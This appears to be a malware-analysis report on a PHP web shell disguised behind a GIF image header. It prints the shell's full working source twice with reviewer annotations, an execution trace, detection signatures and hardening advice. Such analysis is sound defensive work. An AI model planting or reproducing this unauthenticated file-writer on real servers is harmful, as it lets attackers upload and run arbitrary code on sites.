PHP Malware Analysis

uploader.q.w.php.1.fla

md5: 40f4d9f86272cde6ece7ce290bba1764


Deobfuscated PHP code

GIF89a?????????????????????!??????????????,?????????????????????D???;????
<?php 
// NOTE(analysis): the comments marked NOTE(analysis) are reviewer annotations,
// not part of the sample. The only comment the sample itself carries is the URL line below.
//
// Summary: a single-file, unauthenticated file-drop web shell. Every request
// renders one HTML form; two POST actions write request-supplied bytes to a
// request-supplied path (fwrite for pasted text, copy() for an uploaded file).
// Nothing in this script checks a session, password, token or source address.
// On the page the PHP open tag is preceded by a GIF89a header, so the file
// starts with image magic bytes while still containing executable PHP.

// NOTE(analysis): fixed banner emitted on every response; the literal
// "d3b~x Injector" is a stable content signature for file and HTTP-body scanning.
print "<pre />\r\n############################################\r\n##         d3b~x Injector         ##\r\n############################################\r\n";
// NOTE(analysis): the next line is the sample's own comment. No statement in
// this script fetches or references that URL; treat it as a related indicator
// whose role is unconfirmed.
//http://st3cycling.com/.txt
// NOTE(analysis): turns PHP error reporting off for this request, so failed
// writes produce only the script's own status text.
error_reporting(0);
// NOTE(analysis): all three values come straight from the POST body.
//   content -> bytes to write (stripslashes() removes backslash escaping first)
//   cfile   -> destination path for the "Create" action
//   ufile   -> destination path for the "Upload" action
// None of them is validated, normalised or restricted to a directory/extension.
$content = stripslashes($_POST['content']);
$cfile = $_POST['cfile'];
$ufile = $_POST['ufile'];
// NOTE(analysis): page title string; a second usable signature.
echo "<BLINK><title>---===[d3b~X]===---</title></BLINK>";
// NOTE(analysis): php_uname() output (OS, hostname, kernel build) is disclosed
// to any client that can reach the file.
echo '<b><br>' . php_uname() . '<br></b>';
// NOTE(analysis): multipart form posting back to the same URL (action="").
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"aw\" id=\"aw\">";
// NOTE(analysis): $content is reflected into the textarea without
// htmlspecialchars(), so the submitted text is echoed back as raw markup.
echo '<textarea name=content style="width:625px;height:300px;background:#000; font-size: 15px bolder; 
color: #00ff00; font-family: "Courier New" >' . $content . '</textarea><br>';
// NOTE(analysis): both filename fields are pre-filled with "newfile.php".
echo "<input type=\"text\" name=\"cfile\" size=\"10\" value=\"newfile.php\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\">";
echo "<input name=\"_create\" type=\"submit\" id=\"_upl\" value=\"Create\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\" >";
echo "<input type=\"file\" name=\"file\" size=\"30\"><input type=\"text\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\" name=\"ufile\" size=\"10\" value=\"newfile.php\">";
echo "<input name=\"_upload\" type=\"submit\" id=\"_upl\" value=\"Upload\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\"></form>";
// NOTE(analysis): "Create" action. fopen(..., 'w') creates or truncates the
// path named in cfile, then writes the posted content verbatim. The status
// strings are Indonesian ("Membuat ... GAGAL/SUKSES" = "Creating ... FAILED/
// SUCCESS") and are useful response-body signatures.
// Hardening that defeats this branch lives outside the file: a web root that
// the PHP user cannot write to, no script execution in upload directories,
// and alerting on new script files created by the web-server account.
if ($_POST['_create']) {
    $handle = fopen($cfile, 'w');
    if ($handle) {
        if (fwrite($handle, $content) === FALSE) {
            echo "<b>Membuat {$cfile} GAGAL</b><br>";
        } else {
            echo "<b>Membuat {$cfile} SUKSES !!!</b><br>";
        }
        fclose($handle);
    } else {
        echo "<b>Membuat File GAGAL</b><br><br>";
    }
}
// NOTE(analysis): "Upload" action. The temporary upload is copied to the path
// named in ufile (not to the client-supplied filename); copy() is used instead
// of move_uploaded_file(), and '@' suppresses any warning. The success string
// carries a stray </font> closing tag, which makes it distinctive.
if ($_POST['_upload']) {
    if (@copy($_FILES['file']['tmp_name'], $ufile)) {
        echo "<b>Upload {$ufile} SUKSES !!!</b><br><br></font>";
    } else {
        echo "<b>Upload {$ufile} GAGAL !!!</b><br><br>";
    }
}

Execution traces

data/traces/40f4d9f86272cde6ece7ce290bba1764_trace-1676256399.6512.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:47:05.549057]
1	0	1	0.000199	393608
1	3	0	0.000295	401392	{main}	1		/var/www/html/uploads/uploader.q.w.php.1.fla	0	0
2	4	0	0.000314	401392	error_reporting	0		/var/www/html/uploads/uploader.q.w.php.1.fla	11	1	0
2	4	1	0.000330	401432
2	4	R			22527
2	5	0	0.000346	401392	stripslashes	0		/var/www/html/uploads/uploader.q.w.php.1.fla	12	1	NULL
2	5	1	0.000360	401456
2	5	R			''
1		A						/var/www/html/uploads/uploader.q.w.php.1.fla	12	$content = ''
1		A						/var/www/html/uploads/uploader.q.w.php.1.fla	12	$cfile = NULL
1		A						/var/www/html/uploads/uploader.q.w.php.1.fla	12	$ufile = NULL
2	6	0	0.000409	401424	php_uname	0		/var/www/html/uploads/uploader.q.w.php.1.fla	14	0
2	6	1	0.000424	401536
2	6	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000447	401424
			0.000476	314424
TRACE END   [2023-02-13 00:47:05.549374]


Generated HTML code

<html><head></head><body>GIF89a?????????????????????!??????????????,?????????????????????D???;????
<pre>############################################
##         d3b~x Injector         ##
############################################
<blink><title>---===[d3b~X]===---</title></blink><b><br>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br></b><form action="" method="post" enctype="multipart/form-data" name="aw" id="aw"><textarea name="content" style="width:625px;height:300px;background:#000; font-size: 15px bolder; 
color: #00ff00; font-family: " courier="" new"=""></textarea><br><input type="text" name="cfile" size="10" value="newfile.php" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"=""><input name="_create" type="submit" id="_upl" value="Create" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"=""><input type="file" name="file" size="30"><input type="text" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"="" name="ufile" size="10" value="newfile.php"><input name="_upload" type="submit" id="_upl" value="Upload" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"=""></form></pre></body></html>

Original PHP code

GIF89a?????????????????????!??????????????,?????????????????????D???;????
<?php
// NOTE(analysis): reviewer annotations are prefixed NOTE(analysis); the URL
// comment further down is the only comment present in the sample itself.
// As captured, the file begins with a GIF89a header ahead of this open tag.
// The script is an unauthenticated file writer: it draws one form and, on
// POST, writes request-supplied content to a request-supplied path.
print('<pre />
############################################
##         d3b~x Injector         ##
############################################
');
// NOTE(analysis): sample's own comment follows; the URL is not used by any
// statement here, so its purpose cannot be determined from this file.
//http://st3cycling.com/.txt


// NOTE(analysis): error reporting disabled, then three unvalidated POST
// fields are read: content (file body), cfile and ufile (destination paths).
error_reporting(0);
$content = stripslashes($_POST['content']); $cfile = $_POST['cfile']; $ufile = $_POST['ufile'];
// NOTE(analysis): title string and php_uname() host details are sent to every
// requester; both are usable as response signatures.
echo '<BLINK><title>---===[d3b~X]===---</title></BLINK>'; 
echo '<b><br>'.php_uname().'<br></b>'; 
// NOTE(analysis): self-posting multipart form; $content is echoed back
// without HTML escaping.
echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">'; 
echo '<textarea name=content style="width:625px;height:300px;background:#000; font-size: 15px bolder; 
color: #00ff00; font-family: "Courier New" >'.$content.'</textarea><br>'; 
echo '<input type="text" name="cfile" size="10" value="newfile.php" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";">'; 
echo '<input name="_create" type="submit" id="_upl" value="Create" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";" >'; 
echo '<input type="file" name="file" size="30"><input type="text" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";" name="ufile" size="10" value="newfile.php">'; 
echo '<input name="_upload" type="submit" id="_upl" value="Upload" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";"></form>'; 
// NOTE(analysis): "Create" branch - fopen() in 'w' mode on the cfile path,
// then fwrite() of the posted content. Status text is Indonesian
// ("Membuat" = "creating", "GAGAL" = "failed", "SUKSES" = "success").
 if($_POST['_create']){ 
  $handle = fopen($cfile, 'w'); 
  if($handle){ 
      if (fwrite($handle, $content) === FALSE) { echo "<b>Membuat $cfile GAGAL</b><br>"; } 
      else { echo "<b>Membuat $cfile SUKSES !!!</b><br>"; } fclose($handle); 
  } else { echo '<b>Membuat File GAGAL</b><br><br>'; } 
  } 
// NOTE(analysis): "Upload" branch - copies the temporary upload to the ufile
// path with warnings suppressed by '@'; no type, size or extension check.
  if($_POST['_upload']){ 
  if(@copy($_FILES['file']['tmp_name'], $ufile)) { echo "<b>Upload $ufile SUKSES !!!</b><br><br></font>"; } 
  else { echo "<b>Upload $ufile GAGAL !!!</b><br><br>"; } 
  } 
 ?>